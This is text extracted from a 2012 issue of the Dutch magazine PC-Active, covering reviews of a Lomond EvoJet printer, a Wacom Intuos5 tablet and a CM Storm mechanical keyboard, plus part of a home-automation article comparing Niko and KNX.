PC-ACTIVE | Nr. 262 – 2012
Russische printer.indd 62
9/6/12 4:25 PM
LOMOND EVOJET OFFICE
Epson Stylus Photo PX730WD
A4 z/w
A4 kleur
A4 foto
€ 0,0276
€ 0,0863
€ 1,2400 € 0,8400
HP Photosmart 7510
€ 0,0265
€ 0,0998
Canon PIXMA MG4150
€ 0,0292
€ 0,0438
€ 0,5600
Dell V525W
€ 0,0327
€ 0,1136
€ 1,9400 € 1,3600
Brother DCP J725DW
€ 0,0410
€ 0,0730
Xerox WorkCentre 6015V/N
€ 0,0288
€ 0,1193
nvt
Gemiddelde
€ 0,0310
€ 0,0893
€ 1,1880
EvoJet Office
€ 0,0233
€ 0,0571
€ 0,2495
en printkop zijn volgens opgave van de fabrikant, maar we hebben dat wel degelijk gecontroleerd en voor kleurenfoto’s lijken deze aantallen volstrekt reëel. De verwisselbare printkop komt op ongeveer viertiende cent per pagina, maar met een capaciteit van vijftigduizend afdrukken overtreft deze de te verwachten levensduur van de meeste consumentenprinters ruimschoots. In Tabel 2 hebben we de totale verbruikskosten, inkt en voor de EvoJet ook printkop, voor deze printer eens vergeleken met die van de printers uit onze printertest in PC-Active # 261 van september 2012. De resultaten spreken voor zichzelf: over bijna de hele linie is deze printer goedkoper qua afdrukken. Maar vooral bij A4-foto’s wordt het verschil wel erg groot: slechts 25 cent inclusief negentien procent BTW dit keer, terwijl de eerstvolgende concurrent, de Canon PIXMA MG4150, met 56 cent meer dan het dubbele kost. Jammer dat fotopapier nog altijd wat duur is… Ook stroom kost geld. En stroomverbruik laat zich meten. Dan blijkt dat de EvoJet in stand-by slechts 86 mA vraagt, terwijl afdrukken gemiddeld zo’n 180 mA kost. Zeg, 20 om 40 Watt. Die eerste is wat hoog, die tweede heel netjes, want je zal niet snel uren afdrukken met dit snelheidsmonster. Wie de printer dag en nacht aan laat staan, verspilt zo’n 35 euro per jaar. Waar we wel van schrokken, was het sluipverbruik van alleen de losse voeding: met de printer zelf uitgeschakeld vreet die nog altijd 15 Watt, dus € 27,50 per jaar. Dat zou beter moeten kunnen.
| HARDWARE
Tabel 2: Verbruikskosten vergeleken (inkt en voor de EvoJet ook printkop)
nieuwe techniek. En die is niet alleen aan fabrikant Lomond voorbehouden. Onder het afdrukken is de EvoJet redelijk stil - maar bij tijd en wijle wordt de hele machinekamer in deze printer blijkbaar even wakker en klinken er allerlei verschillende motortjes. Niet storend, maar wel anders dan bij de gewone printers. Soms heeft de gebruiker wel last van de Russische afkomst van het apparaat. Zo leidde de keuze Get Support in de Engelstalige gebruikersinterface - ook via USB in de browser te openen - naar een webpagina in Cyrillisch schrift. Google Translate is niet ideaal, als je ondersteuning nodig hebt en de FAQ’s wil raadplegen. De bediening is vrij Spartaans uitgevoerd, met drie drukknoppen en tien ledjes. ’t Is even wennen, maar daarna spreekt alles voor zich. Statuspagina’s afdrukken, printkop reinigen, ’t gaat allemaal moeiteloos via de webinterface. Bovendien zijn er ook versies - weer iets duurder - waar het lcd-schermpje al zijn intrede heeft gedaan, en zelfs all-in-ones met deze printtechniek aan boord. Tenzij u een goed excuus weet te bedenken om het geld eraan uit te geven - dat clubblaadje verdient zich redelijk rap terug - moeten we tot onze diepe spijt deze printer vooralsnog afraden, zolang hij niet in prijs daalt. De techniek is fascinerend, de Russische regendouche werkte tijdens de test onverdroten en zonder enig probleem. ’t Is een bakbeest, maar mooi rap!
Lomond of Memjet? Lomond is de fabrikant van deze printer, maar gebruikt de techniek van Memjet. Dat zijn de mensen die deze brede inkjetprintkoppen maken, voor meerdere doeleinden. Naast kantoorprinters zijn er ook specifieke industriële labelprinters en ook fotoprinters, die door meerdere bedrijven worden gemaakt rond de diverse koppen en controllers van Memjet. Tot nog toe waren deze technieken niet beschikbaar voor ‘goedkopere’ printers, zoals deze Lomond EvoJet. Daar komt hopelijk verandering in, in de toekomst. Want zo snel - en betaalbaar - printen zou wat ons betreft de toekomst mogen worden. Met 70.400 nozzles en 557 miljoen inktdruppels van 1 picoliter per seconde is deze printkop inderdaad een technisch wondertje en het geheim achter deze
Lomond EvoJet Office Prijs: € 1187,62 (incl. BTW) http://www.evojet.nl/
PC-ACTIVE | Nr. 262 – 2012
Russische printer.indd 63
63
9/6/12 4:25 PM
WACOM INTUOS5 TOUCHTABLET
DUUR, GROOT EN HEEL HANDIG! TEKST : WAMMES WITKOP
De meeste mensen kunnen met toetsenbord en muis prima uit de voeten - maar voor wie wil tekenen, zijn er tablets. Ze bestaan al heel lang, maar de ontwikkelingen denderen door. Tijd om eens naar de Rolls Royce onder de tablets te kijken. Want de Wacom Intuos5 TouchTablet kent wel heel aardige trucjes…
N
atuurlijk kunt u tekenen op een Intuos5 van fabrikant Wacom. En hoe! De drukgevoelige pen werkt met 2048 niveaus van pendruk en registreert ook nog eens de hoek waaronder die pen wordt gehouden. Gecombineerd met de ruime keus aan meegeleverde penpunten en de instellingen in de software krijgt u zo - naar keuze - het gevoel dat u heel nauwkeurig met een RotRing-tekenpen bezig bent, of juist met houtskool zit te schetsen. Uit de hand tekenen werkt zo wel heel natuurlijk, tenminste met software die druk- en hoekgevoeligheid ondersteunt, zoals Photoshop, Illustrator of Corel Painter.
64
Afmetingen Hoe groter, hoe beter, bij tekentablets. Per slot van rekening schetst het beter op een groot oppervlak dan op een miniatuurbloknootje. Maar het wordt wel snel duurder met een groter actief vlak. Vandaar dat er drie afmetingen zijn - zie tabel 1 - en wie serieus zo’n apparaat overweegt, te groot bestaat niet! Tenzij u met de optionele draadloze kit vanuit de hand wilt gaan schetsen, want dan wordt dat grootste model toch wat zwaar om voortdurend vast te houden. Alle modellen hebben een keurig oplossend vermogen van 5080 lijnen per inch, wat neerkomt op 0,005 millimeter, terwijl de pen tot op 10 millimeter kan worden gelezen.
PC-ACTIVE | Nr. 262 – 2011
Wacom-tablet.indd 64
9/6/12 4:35 PM
WACOM-TABLET
Vele opties voor gebaren
Ook hebben ze allemaal een handige Touch Ring met centrale knop - een bedieningsorgaan dat we meestal met muziekspelertjes associëren, maar dat ook hier erg handig blijkt - en een aantal vaste knoppen, zes op de kleinste en acht op de beide andere formaten. Op één na zijn ze allemaal ook te bedienen met de vingers, waarbij de multi-touch gevoeligheid heel veel verschillende gebaren mogelijk maakt, met tot vijf vingers tegelijk aan toe. Ook vergroten, verkleinen en kantelen zijn natuurlijk ook mogelijk, intuïtief met twee vingers. Alleen de Intuos5 M ontbeert deze mogelijkheid en is een stuk goedkoper. Zelf zouden we absoluut wel voor touch gaan. Wat vreemd overkomt: volgens de specificaties is het aanraakgevoelige oppervlak van het grootste model net wat kleiner dan het pengevoelige gebied. Aangezien ons testexemplaar een aanraakgevoelig middenmodel was, hebben we niet kunnen vaststellen of dit in de praktijk nadelen heeft.
Bediening Met de draadloze pen - die geen batterijen nodig heeft - kunnen we niet alleen tekenen, waarbij de lijnen worden beïnvloed door zowel de pendruk als de hoek waarin hij wordt gehouden, maar het is ook mogelijk de tekeningen weer uit te gummen door de pen om te
| HARDWARE
Handig taartmenu
draaien. Datzelfde instrumentje kan ook net als een muis de software bedienen: aanwijzen, klikken, dubbelklikken en slepen - het kan allemaal. De zijschakelaar zal standaard dubbelklikken als we hem aan de bovenzijde indrukken; doet u dat onderop, dan levert dat een rechtse muisklik op. Na wat oefening werkt dit zeker zo prettig als een gewone muis. Maar de tablet kan meer: de aanraakgevoeligheid houdt in dat allerlei gebaren met één of meer vingers keurig worden vertaald naar toetscombinaties. Standaardgebaren resulteren in een uiterst handige navigatie door de documenten of toepassingen. En met vier vingers horizontaal heen en weer wandelt u door de open programma’s heen. Dan zijn er ook nog de zelf in te stellen gebaren, om nog sneller en vrijer te kunnen kiezen zonder dat u gebruik hoeft te maken van de standaard Windows-menustructuur. De functietoetsen en het scroll-wiel bieden dezelfde vrijheden. Elke denkbare actie biedt een hele reeks mogelijkheden, tot en met reeksen toetsaanslagen aan toe, waarmee veel programma’s zich geheel naar uw hand laten zetten.
Diverse programma’s? De tablet is zich daarbij bewust van welk programma er wordt gebruikt. Wilt u voor het ene tekenpakket
Hulpje op het scherm
De functietoetsen
PC-ACTIVE | Nr. 262 – 2011
Wacom-tablet.indd 65
65
9/6/12 4:35 PM
HARDWARE
| WACOM-TABLET
MAAK KANS OP EEN WACOM INTUOS5 TOUCH M, t.w.v. € 369,90 Wacom geeft in samenwerking met PC-Active een Intuos5 Touch M tablet weg. Om kans te maken op deze mooie prijs surft u naar http://www. wacom.eu/better-pictures. Beantwoord vervolgens de vraag in het Wacom Intuos5-topic op http://forum.pc-active.nl. De origineelste inzending wint de tablet. Elke deelnemer krijgt een leuk voordeeltje aangeboden.
een wat subtielere reactie op de pendruk dan in het andere? Geen enkel probleem. Elk item in het instellingenmenu is voor ieder gewenst programma apart in te stellen. En om het nog mooier te maken, als verschillende mensen de pc delen, kunnen die ieder voor zich de eigen voorkeuren opslaan. Maximale flexibiliteit is met deze meervoudig gelaagde menustructuur verzekerd. En - het werd zijdelings al genoemd - er is een los bij te kopen optie om elk van deze tablets draadloos te gebruiken, bestaande uit een in de tablet te klikken zender en accu alsmede een kleine USBontvanger voor in de pc. En slim genoeg: zodra de tablet de penpunt detecteert en deze zich dus binnen de tien millimeter van het oppervlak bevindt, wordt de touch-optie stilgelegd. Dus wie tijdens het tekenen met de hand op de tablet rust, loopt geen risico’s per ongeluk allerlei touch-opdrachten te geven.
phones eens in ogenschouw nemen, ziet het ernaar uit dat bediening door middel van gebaren de komende jaren een steeds grotere rol zal spelen. Dat zal zich ongetwijfeld vertalen naar notebook en desktop - en dat is iets om behoorlijk blij van te worden, zeker na de positieve ervaring met deze tablet.
Wacom Intuos5 touch
Leercurve
Intuos5 touch S: € 224,90 Intuos5 touch M: € 369,90 Intuos5 touch L: € 479,90 Intuos5 M: € 299,90 Wacom Wireless Accessory Kit: € 39,90 http://www.wacom.eu/better-pictures
Dit is meer dan een tekentablet, hoewel hij die functie meer dan uitstekend vervult. Het is feitelijk een volstrekt alternatieve manier om de computer naar uw eigen hand te zetten, bij uitstek geschikt voor grafisch werk. De combinatie van pen als muisvervanger en tekeninstrument, de op grafisch werk toegesneden functietoetsen - waarbij onder het scroll-wieltje ook allerlei snel bedienbare menu’s en submenu’s in taartvorm vallen onder te brengen - en de uitgebreide mogelijkheden om met gebaren acties in gang te zetten, is overweldigend. En zelfs de erg fraaie mogelijkheid om desgewenst halfdoorzichtige hints op het scherm te projecteren - Wacom noemt dat een heads-up display - kan niet verhullen dat het geruime tijd en de nodige oefening zal kosten om deze tablets maximaal te benutten. Wie vaak grafisch aan de slag is, zal merken dat deze alternatieve bediening tijd bespaart, maar wel met een flink steile leercurve. Deze tablets zijn voor de rest van ons een aardige blik op de toekomst. Als we de ontwikkelingen bij smart-
Afmetingen (mm) Breed
Diep
Actief pengebied
Actief aanraakgebied
Hoog
Breed
Diep
Breed
Diep
Gewicht (gram)
Multi-touch
Toetsen
Prijs
Intuos 5 touch S
320
208
12
157
98
157
98
660
Ja
6
€ 224,90
Intuos 5 M
380
251
12
224
140
nvt
nvt
970
Nee
8
€ 299,90
Intuos 5 touch M
380
251
12
224
140
224
140
990
Ja
8
€ 369,90
Intuos 5 touch L
487
318
12
325
203
299
190
1800
Ja
8
€ 479,90
Tabel 1: Details Intuos5 tablets
66
PC-ACTIVE | Nr. 262 – 2011
Wacom-tablet.indd 66
9/6/12 4:36 PM
ALLES OVER TOETSENBORDEN
VAN SHOLES TOT CM STORM TEKST : HANS NIEPOTH
CoolerMaster, bekend van de processorkoelingen, brengt onder de merknaam CM Storm ook mechanische toetsenborden uit. Een mooie aanleiding om eens in de geschiedenis van het toetsenbord te duiken.
H
et moderne toetsenbord vindt zijn oorsprong in de uitvinding van de typemachine in 1868. Uitvinder Christopher Sholes zette de tekens aanvankelijk in alfabetische volgorde, maar dat had tot gevolg dat snel na elkaar aangeslagen letters tegen elkaar sloegen en klem kwamen te zitten. Om de kans te beperken dat de stangetjes elkaar raakten, werden letters die vaak op elkaar volgden, zo geplaatst dat ze moeilijk
68
CM Storm.indd 68
vlug achter elkaar konden worden aangeslagen. Zo ontstond de QWERTY-indeling en die is tot op de dag van vandaag vrijwel gelijk gebleven. Op Amerikaanse toetsenborden zijn later de C en de X verwisseld en is de M een rij gezakt. Ook op Franse en Duitse toetsenborden zijn enkele aanpassingen gedaan en hebben letters met accenttekens een plaatsje gekregen, waardoor de AZERTY- en de QWERTZindelingen ontstonden, maar verder wijken ook die
PC-ACTIVE | Nr. 262 – 2012
9/6/12 12:42 PM
TOETSENBORDEN
| HARDWARE
toetsenborden weinig af van het origineel. Pogingen om tot een heel andere indeling te komen, zoals het Dvorak-toetsenbord, hebben nooit succes gehad. We zouden ons kunnen afvragen waarom we nog steeds met een opzettelijk onergonomisch gemaakt QWERTY-toetsenbord werken, terwijl er al sinds het bekende IBM-letterbolletje in de elektrische schrijfmachine geen noodzaak meer toe is. Waarschijnlijk drukt het gewicht van de geschiedenis ook hier te zwaar.
De techniek Toetsenborden zijn er in alle soorten en maten, vaak met extra functietoetsen of met bijzondere vormen, maar de kwaliteit komt meestal op de tweede plaats. Op het merendeel van de huidige modellen liggen de toetsen op een stuk rubber met verende noppen die ervoor zorgen dat de toets terugveert nadat die is ingedrukt en weer losgelaten. Onder deze rubber dome bevindt zich een membraan dat de aanslag registreert. Bij deze techniek moet de toets volledig worden ingedrukt om contact tussen de lagen van het membraan te maken. Een techniek die vooral in laptoptoetsenborden wordt gebruikt, is de zogenoemde scissor switch. Ook hierbij wordt een rubber dome toegepast, maar worden de toetsen vastgehouden door een scharend mechanisme. De toetsindruk is minder diep, meestal 2 millimeter in plaats van 3 tot 4 millimeter, waardoor het toetsenbord dunner kan zijn. De toetsen hebben iets minder lang nodig om terug te komen na een aanslag, omdat het schaarmechanisme de toets weer omhoog drukt. Rubber dome-toetsenborden zijn vrij goedkoop te produceren, maar slijten snel en reageren na verloop van tijd steeds minder goed.
Schuimrubber kussentje De goedkoopste oplossing staat bekend als foam and foil. Deze schakelaars bestaan uit een staafje aan het eind waarvan een schuimrubber kussentje is bevestigd dat weer is afgedekt met een laagje aluminiumfolie. Bij het indrukken sluit het metalen laagje een circuit op de onderliggende toetsenbordmatrix kort, waardoor de aanslag wordt gedetecteerd. Een veertje om de staaf zorgt ervoor dat de toets terugveert. Deze techniek is het best te vergelijken met het principe van de deurbel. Schakelaars van dit type krijgen snel last van vuil en corrosie en zijn weinig duurzaam. Er bestaan betere technieken, zoals de mechanische en de contactloze capacitive toetsenborden. Een capacitive schakelaar werkt met een condensator die wordt gevormd door twee metalen plaatjes, waarop een spanning wordt gezet. Eén van de plaatjes bevindt zich onder de toets, de ander zit daar gefixeerd tegenover. Volgens de wetten van de elektronica verandert de lading van een condensator als de afstand tussen de plaatjes verandert. Komt het metalen plaatje onder de toets bij het indrukken daarvan dichter bij
Rubber dome
het plaatje daaronder, dan zal de toetsenbordprocessor dit verschil detecteren en interpreteren als een aanslag op die locatie. De twee oppervlakken komen niet met elkaar in contact, waardoor er weinig slijtage optreedt. Nadeel: de techniek is duur en zo ook de toetsenborden.
Sluimerend bestaan De mechanische toetsenborden leden lang een sluimerend bestaan onder een kleine schare liefhebbers, maar kunnen nu rekenen op een groeiende belangstelling, met name onder de veeltypers en de gamers. Er zijn diverse redenen om een mechanisch toetsenbord te prefereren. Om te beginnen wordt er beter materiaal gebruikt en gaat het langer mee. Minstens even belangrijk echter is de keuze uit verschillende soorten feedback. Er zijn verschillende varianten met of zonder klik en al of niet met voelbaar registratiepunt, en ook de kracht die nodig is om de aanslag te activeren
Buckling spring Het originele IBM-toetsenbord is volgens sommigen het beste toetsenbord dat ooit werd gemaakt, vooral ook omdat de voelbare en hoorbare feedback exact samenvalt. Kenmerkend aan dit model is de zogeheten buckling spring, een veertje dat bij het indrukken dubbelklapt en voor een fraai feedbackgevoel zorgt. Het model F, dat met de introductie van de eerste XT werd uitgebracht, was ook een capacitive systeem en had een hamertje onder de veer dat de twee plaatjes van de condensator samendrukte, waardoor de aanslag werd geregistreerd. De vervolgens op de markt verschenen goedkopere uitvoering, Model M, werkte ook met de buckling spring, maar dan met een membraan dat fysiek contact maakte. Model F is niet meer in productie, maar Model M wordt nog steeds gemaakt door het bedrijf Unicomp en is daar ook te koop. Een vergelijkbare schakelaar wordt ook nog gemaakt door het Japanse Topre. Dit mechaniek bestaat uit een veer onder een rubberlaag, waarvan het indrukken weer een verschil in de capaciteit van een condensator veroorzaakt. Topre-schakelaars zijn stil en worden toegepast in de topklasse toetsenborden van tweehonderd euro of meer, bijvoorbeeld het Happy Hacker Keyboard.
PC-ACTIVE | Nr. 262 – 2012
CM Storm.indd 69
69
9/6/12 12:43 PM
HARDWARE
| Toetsenborden
De rode led’jes
varieert. In tegenstelling tot de rubber dome-typen hoeft u bij geen enkel type de toetsen geheel in te drukken om een aanslag te registreren. De terugveertijd van de schakelaars is met circa 5 milliseconde ook sneller dan bij de rubber dome-toetsenborden. Door de kortere responstijd kan iemand die gewend is aan een mechanisch toetsenbord, er sneller mee typen of gamen. Er zijn naast CoolerMaster diverse fabrikanten die een mechanisch model hebben uitgebracht, maar één naam duikt steeds op: Cherry. Hoewel ZF Electronics - voorheen Cherry Corp - zelf toetsenborden maakt, met name voor industriële omgevingen, levert dit bedrijf bijna alle schakelaars voor de fabrikanten van mechanische toetsenborden. Alle Multiple Exposureof MX-schakelaars hebben een palletje dat halverwege de aanslag al contact maakt - het actuation point - en de aanslag registreert. Als u wilt, kunt u de toets verder indrukken, maar nodig is dit niet. De verschillende MX-schakelaars zijn herkenbaar
Persoonlijke ervaring Wie van een rubber dome overstapt op een mechanisch toetsenbord, zoals de auteur van dit artikel, doet een nieuwe ervaring op. Het is even wennen, maar na twee weken ratelen en onnodig te diep en te hard indrukken van de toetsen kreeg ik de slag te pakken. Aanvankelijk ging ook mijn typnauwkeurigheid er op achteruit, maar uiteindelijk ging het tikken steeds soepeler, zelfs met de Cherry Red-switches die niet in de eerste plaats zijn bedoeld om veel te typen. CoolerMaster heeft inmiddels drie verschillende toetsenborden voor gamers met de rode en zwarte schakelaars. De typisten van lange documenten, voor wie een Cherry Blue-toetsenbord het meest gepast zou zijn, kunnen nog niet bij CoolerMaster terecht.
70
CM Storm.indd 70
aan hun kleur. De zwarte modellen zijn lineair, nontactile en het best voor gaming. Een lineair toetspad houdt in dat de kracht die nodig is om de toets in te drukken, ook na het activatiepunt bij 60 gram nog toeneemt tot 80 gram om tot de bodem van de aanslag te komen. In de aanslag zit geen voelbare hobbel en de activatie- en releasepunten vallen samen, wat prettig is in games die om dubbeltappen vragen. Cherry MX Blue-schakelaars zijn het meest geschikt om gewoon te typen. De tactile bump is duidelijk voelbaar en een los deeltje in de schakelaar zorgt voor een hoorbare klik als teken dat u de toets kunt loslaten. De bruine MX-variant houdt het midden tussen typen en gamen. De schakelaar geeft geen klik, maar geeft wel feedback door een kleine uitstulping op de plaats waar de aanslag wordt geregistreerd. De MX Clear is een stuggere variant van de bruine en de MX Red is juist iets lichter in te drukken dan de zwarte. De Cherry MX Red is ook de schakelaar die in de Storm Quickfire Pro wordt gebruikt.
CM Storm Quickfire Pro De eerste zaken die opvallen als u de CM Storm Quickfire Pro ter hand neemt, zijn het grote gewicht - 1,3 kilo - en verder de zeer solide uitvoering. De meegeleverde stugge USB-kabel heeft een mini-USB-aansluiting aan de kant van het toetsenbord en is strak in een kabelgootje te drukken, waardoor de stekker niet snel zal worden losgetrokken. Bijzonder detail is ook de ontstorende ferrietkraal in de kabel, waardoor hoogfrequente stoorsignalen worden onderdrukt. Verder valt het Quickfire Pro-toetsenbord op door de matte cilindrische toetskapjes met gelaserde opdruk. De toetsen verschillen per rij ook van vorm, al naar
PC-ACTIVE | Nr. 262 – 2012
9/6/12 12:43 PM
TOETSENBORDEN
gelang de hoek die de vingers met het bord maken. Aan de linkerzijde van het toetsenbord bevinden zich de knoppen die veel bij games worden gebruikt. Ze zijn voorzien van rode led’jes die er prachtig doorheen schijnen, zodat de toetsen ook in een donkere kamer goed zichtbaar zijn. De achtergrondverlichting kent verschillende standen. Eén van de modi verlicht alleen de WASD-toetsen - die veel in first person shooters worden gebruikt om de richting aan te geven - en de overeenkomstige pijltoetsen. De andere mode breidt het WASD-cluster uit met de toetsen QERZXC, 12345, F1 F2 F3 F4, Esc en de spatiebalk. Maar voor de gamers misschien nog belangrijker: met de Quickfire Pro kunt u een onbeperkt aantal toetsen tegelijk indrukken, zonder dat er input verloren gaat. Op een ‘normaal’ toetsenbord lukt het niet drie tekens tegelijk te registreren, omdat de fabrikanten de roll-over blokkeren, vaak ook via een driver. Dit wordt gedaan om te voorkomen dat er bij het typen per ongeluk een derde ghost-teken meekomt dat niet is ingedrukt. Met andere woorden, de meeste toetsenborden zijn 2-KRO, two Key Roll Over. Bij het spelen van een spel zit die toetsblokkade uiteraard in de weg, reden waarom de fabrikanten van game-toetsenborden die blokkade niet toepassen. Tot voor kort bleek het via de USB-aansluiting echter niet mogelijk verder te komen dan 6-KRO, wat betekende dat er zes toetsen konden worden ingedrukt, waarbij de modifier keys als Ctrl, Alt en Shift mochten worden opgeteld. Met een PlayStation2-aansluiting - in tegenstelling tot USB niet een polling, maar een interrupt-systeem - was dit nooit een punt, maar de PS2-connector is inmiddels van de meeste pc’s verdwenen. Met enige trots meldt CoolerMaster echter dat het is gelukt op het CM Storm-bord ook NKRO ofwel Non Key Roll-Over te realiseren, wat betekent dat alle tegelijkertijd ingedrukte toetsen doorkomen. Er zullen ongetwijfeld gamers zijn die er hun voordeel mee doen. Na het activeren van de FN-toets krijgen verschillende teken- en functietoetsen een andere betekenis. Zo wijzigt de F1-toets van help-functie naar aan/ uitschakelaar voor de rode led-verlichting, die met de F4-functietoets dan weer in de verschillende modi is te zetten. Er zijn games die de Windows-toets uitschakelen, zodat de speler in het heetst van de strijd niet per ongeluk naar het bureaublad springt, maar op het Storm-bord is dit ook expliciet in te stellen met de F12toets. De functietoetsen F5 tot F11 zijn te gebruiken voor macro’s die opties direct beschikbaar maken in plaats van daar een menu voor te hoeven doorwerken. Verder kent het Storm-toetsenbord vier standen die de polling-rate instellen op respectievelijk 125 Hz/8 ms, 250 Hz/8 ms, 500 Hz/2 ms en 1000 Hz/1 ms. Via de USB-aansluiting zou dit toetsenbord binnen 1 milliseconde moeten kunnen reageren op een toetsaanslag, zodat de gebruiker altijd directe feedback krijgt in snelle actiegames. Het nut daarvan mogen we
| HARDWARE
echter in twijfel trekken. Alle Cherry MX-schakelaars hebben een debouncing time van 5 milliseconden, de tijd die verstrijkt voordat er een nieuwe aanslag kan worden geregistreerd. Dat houdt in dat een polling rate van meer dan 200 Hz niet zinvol is en als marketinghype is te bestempelen. Het kan zelfs nadelig uitpakken, doordat de processor polling-tijd verspeelt.
Tot slot Voor toetsenborden geldt ‘zoveel mensen, zoveel smaken’. De meeste gebruikers zullen een foam and foil toetsenbord als zompig ervaren, terwijl andere de zachte aanslag mogelijk wel kunnen waarderen. Het merendeel van de gebruikers kent waarschijnlijk alleen een rubber dome toetsenbord en is eraan gewend de toets helemaal in te drukken. Een mechanisch toetsenbord hoeft u niet in te drukken tot de bodem van de aanslag is bereikt. Het activatiepunt is er al veel eerder, maar veel gebruikers missen toch een voelbaar en hoorbaar registratiepunt. De schakelaarfabrikant speelt hier op in door die kwaliteiten in de hardware toe te voegen en inmiddels bestaan er diverse smaken, ieder met zijn eigen voordelen. Afgezien van de persoonlijke smaak zijn er echter grote kwaliteitsverschillen. Mechanische toetsenborden zijn sterker en fraaier afgewerkt. De meeste fabrikanten garanderen vijftig miljoen aanslagen en met gold plated schakelaars zelfs honderd miljoen. Het besproken Storm Quickfire Pro-toetsenbord richt zich met de MX-Red schakelaars en de verlichte WASDtoetsen op de gamers. Dat cluster is waarschijnlijk ook het eerst versleten. In de doos vindt u een key puller om de knoppen makkelijk los te trekken, maar extra toetsen zult u apart moeten bestellen via CoolerMaster.
CM Storm Quickfire Pro Prijs: € 109,95 http://www.cmstore.eu/
INFOLINK 262004
Voor extra informatie: http://www.pc-active.nl/262004
PC-ACTIVE | Nr. 262 – 2012
CM Storm.indd 71
71
9/6/12 12:43 PM
DILEMMA: NIKO OF KNX?
HET HUIS VAN DE TOEKOMST DEEL 2 TEKST : TOINE K AMPHUIS
Vorige maand beschreef medewerker Toine Kamphuis het plan om van zijn nieuwe woning ‘een huis van de toekomst’ te maken. In dit tweede deel van een drieluik gaat hij dieper in op de voor- en nadelen van beschikbare systemen en licht hij zijn keuze toe.
H
et verhaal begint met een domper. De doe-het-zelf insteek van het project is niet zo eenvoudig als ik aanvankelijk dacht. Een hypermodern nieuwbouwhuis anno 2012 zou perfect moeten zijn voor verregaande automatisering. Helaas. Al snel ontdekte ik dat de infrastructuur van ons gloednieuwe huis bij voorbaat achterhaald is. Met name op het gebied van bedrading is er de afgelopen veertig (!) jaar nauwelijks iets veranderd. In
72
de meterkast bevinden zich nog steeds conventionele elektriciteitsgroepen die delen van het huis van stroom voorzien. De draden lopen naar verdeeldozen en van daaruit wordt de stroom verdeeld over verlichtingspunten, schakelaars en wandcontactdozen. Om de boel nog onoverzichtelijker te maken: de logica in de wijze waarop groepen de stroom distribueren, is ouderwets. Zo bevindt de badkamer zich in dezelfde groep als een deel van de slaapkamers. Het andere deel van de slaapkamers zit in een andere groep.
PC-ACTIVE | Nr. 262 – 2012
Huis van de toekomst.indd 72
9/6/12 4:37 PM
Doe-het-zelf domotica
Ontnuchterend Nu denkt u: hoe beïnvloedt de traditionele onderverdeling in groepen de toepassing van domotica? Het antwoord is ontnuchterend. Bij kwalitatief hoogstaande domotica-installaties spreekt men van een zogenoemde verdeler. Die bevindt zich in de meeste gevallen in de meterkast. Van hieruit wordt alles centraal in het huis aangestuurd. Op communicatieniveau gebeurt dit door middel van een bedrade verbinding (buskabel) of draadloze verbinding (radiofrequency-technologie of WiFi). Logisch. Maar bij de elektra-infrastructuur wordt - in de ideale domoticawereld - ook alles rechtstreeks op de verdeler aangesloten. Concreet: alle elektrische apparaten staan dan via een rechtstreekse stroomkabel in direct contact met de verdeler. U voelt de bui al hangen. Zowel in bestaande als in nieuwbouwhuizen is de infrastructuur voor elektriciteit zeer ouderwets. Aangezien het een enorme klus is om honderden meters nieuwe elektriciteitskabels te trekken, heb ik daar maar van afgezien. En ja, daar betaal ik straks de hoofdprijs voor. Hoe gek het ook klinkt: in domoticatermen wordt het project in ons nieuwbouwhuis aangeduid als… renovatie. Het gevolg: meer losse componenten (sensoren, actoren et cetera) zijn benodigd en dit resulteert in hogere investeringskosten.
| HARDWARE
Vorige maand beschreef ik de kennismaking met twee aanbieders van thuisautomatisering: Niko Home Control, het enigszins gesloten systeem van de Belgische firma Niko en KNX, de open standaard waarbij inmiddels een kleine driehonderd bedrijven zijn aangesloten. Waar kies ik voor? Om deze vraag te kunnen beantwoorden ben ik op bezoek geweest bij Niko en KNX-leverancier Hager en heb ik uitgebreid gesproken met vertegenwoordigers. Natuurlijk betreft het hier een kwestie van appels met peren vergelijken. Maar ja, ik zal toch moeten kiezen. Daarom heb ik getracht de voor- en nadelen van beide aanbieders zo overzichtelijk mogelijk op een rijtje te zetten. Zie Tabel 1 en 2.
Keuze maken Uitgangspunt bij beide platforms is: wat wil de klant? De techniek is in eerste instantie ondergeschikt. Deze denkwijze is behoorlijk confronterend voor iemand die houdt van knutselen. Een voorbeeld: voor de woonkamer en de keuken/ eetkamer wilde ik graag bediening voor het dimmen van de led-spotjes in een muurschakelaar. Draaien, schuiven of touchbediening, maakt niet uit. Nu weet ik beter. Negen van de tien keer wilt u het licht dimmen op het moment dat u niet in de buurt bent van de fysieke dimmer. Daarom werkt professionele
Voordelen
Niko
KNX
Installatie
Een centraal geplaatst railsysteem in de verdeler koppelt de modules (actoren). Dit is redelijk plug and play; alleen komt er wel een installateur aan te pas om alles aan te sluiten en het systeem te programmeren. Aangezien de logica al aanwezig is in de hardwaremodules, is het installeren zeer eenvoudig. In de Nikofilosofie wordt zoveel mogelijk centraal aangestuurd. Dat geldt ook voor de stroomvoorziening. Meer fysieke kabels reduceert storingsgevoeligheid en resulteert in minder losse componenten.
Werkt ook zonder centrale aansturing. Verschil met Niko is ook dat de programmeersoftware verschilt per leverancier. Bij sommige leveranciers moet de installateur met de - pittige! - universele programmeertaal ETS aan de gang; soms hebben leveranciers zelf een toegankelijke programmeerinterface. KNX biedt meer flexibiliteit. Het systeem communiceert via bustechnologie (pulskabel), ip (UTP of WiFi) of radiofrequentietechnologie.
Uitbreidbaarheid
Zeer eenvoudig uitbreidbaar, zowel hardware- als softwarematig. Door het gesloten protocol en de ingebakken logica ‘begrijpen’ de modules elkaar direct.
Uitbreidbaarheid in de breedte. Het protocol wordt door meerdere leveranciers ondersteund. Hierdoor heeft KNX aanzienlijk meer uitbreidingsmogelijkheden.
Aanpassen (flexibiliteit)
Het systeem is zeer eenvoudig aan uw wensen aan te passen. Op hardwaregebied kan Niko ook via een interface communiceren met niet-Niko-producten; in die zin ongelimiteerd uitbreidbaar.
Van nature aanpasbaar. Het is mogelijk om producten van verschillende leveranciers binnen de installatie te combineren. Alle aangesloten clients spreken ‘onder de motorkap’ dezelfde taal.
Design
Kwestie van smaak. Niko heeft een hoge wow-factor in het design en hamert erop dat design niet duur hoeft te zijn, zie ook: prijs.
Van ontwerpgoeroes Busch Jaeger en Gira tot minder bekende leveranciers, bij KNX kunt u het zo gek - of suf - maken als u wilt.
Bedrijfszekerheid
Net als Apple OS X: geen gedoe met drivers, eindeloze updates en gesleutel met instellingen. Niko doet wat het moet doen en doet dat gewoon goed.
Vergelijkbaar met Windows. Een goede installatie werkt net zo bedrijfszeker als OS X, maar KNX nodigt zeker uit om te knutselen.
Prijs
